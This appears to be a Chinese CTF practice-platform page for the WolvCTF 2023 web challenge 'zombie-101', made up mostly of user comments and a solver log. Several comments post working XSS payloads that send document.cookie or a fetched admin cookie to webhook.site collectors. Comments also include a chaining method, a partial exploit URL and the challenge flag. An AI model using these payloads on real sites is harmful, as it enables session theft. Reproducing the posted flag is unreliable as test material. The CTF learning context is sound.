zombie-101WEB 未解决

分数: 0 金币: 0
所属赛事: WolvCTF 2023
题目作者: 未知
一  血: Max_yiz
一血奖励: 0金币
解  决: 276
提  示:
描  述:
wctf{}
评论
倦鸟叫了一整天 1年前

看不到源码呀

回复 1
18715082837 6月前

怎么看源码

回复 1

15756309355 1年前

斯,为什么我服务器接受不到cookie的请求,网站根本没有访问我服务器

回复 0
林蔓露 4月前

@yearling 管理员cookie:Wow, we really liked too!

回复 0

lianglllllll 7月前

这个要自己搭吗?之前有道题也是没有

回复 0

lunarbyside 11月前

@yearling 会不会是因为网络是私网地址啊

回复 0

yearling 1年前

我也拿不到cookie,难绷

回复 0

missa 1年前

请问有什么推荐的xss平台吗?网上找的没有用,自己本机去访问都收不到信息,

回复 0
vincentshine 1年前

任何一个带外网站都可以,推荐ceye

回复 0

一只小羊 1年前

<script>fetch('https://webhook.site/aa6a0e67-0dcc-4c44-94cd-ec7c8960b235',{method:'POST',body:document.cookie})</script>

回复 0
lunarbyside 11月前

接收到请求了,但是没搞懂cookie在哪里,然后干嘛呢也不知道,也没看到cookie

回复 1

vincentshine 1年前

感谢老哥的脚本,我用其他的windows.location.href的方式打不开

回复 0

1512624649 2年前

flag=wctf{c14551c-4dm1n-807-ch41-n1c3-j08-93261} http://82.157.146.43:14179/visit?url=http%3A%2F%2F82.157.146.43%3A14179%2Fzombie%3Fshow%3D%253Cscript%253Efetch%2528%2527%252Fdebug%2527%2529.then%252

回复 2

.⎛⎝•̀ω•́⎠⎞. 2年前

典型的xss盗管理员cookie,网上随便找一个xss平台,或者自己用服务器建一个

回复 0

meilanzhuju 2年前

有点晕乎

回复 0

qingfeng1115 2年前

<script>fetch('/debug').then(r=>r.json()).then(j=>fetch('https://webhook.site/8ab574ff-b363-48a3-a1b3-4455a3001925',{method:'POST',body:j.cookie}))</script> 中https://webhook.site/8a

回复 0

yituoshi 2年前

Half the truth is often a big lie: "flag=wctf{c14551c-4dm1n-807-ch41-n1c3-j08

回复 0

justsosoloveyou 2年前

第一个框反射xss,第二个框存储xss。将第一个框触发xss的url输入到第二个框,后台自动访问url后即可触发xss盗取cookie里的flag。注意需要将js编码。

回复 3
lltong 2年前

将js编码,是怎么编码呢

回复 0

WriteUp

image
a2cai

3 金币

评分(0)

暂无评分

解题动态

kxzzy 攻破了该题 11小时前
Carlnb 攻破了该题 1天前
wwwwjjj 攻破了该题 1天前
admin_ 攻破了该题 4天前
yu00zzz 攻破了该题 9天前
xupxload 攻破了该题 11天前
pigpigG6768 攻破了该题 12天前
pudding2024 攻破了该题 14天前
cunhong 攻破了该题 17天前
热吻裙下唇 攻破了该题 17天前
4chfbu 攻破了该题 23天前
xingzou 攻破了该题 23天前
EverGarden 攻破了该题 24天前
sakuye 攻破了该题 25天前
kailiyizhong 攻破了该题 28天前
马猴烧酒吼姆拉 攻破了该题 1月前
pigggg 攻破了该题 1月前
seyana 攻破了该题 1月前
心胜于物 攻破了该题 1月前
qetx 攻破了该题 1月前
问题反馈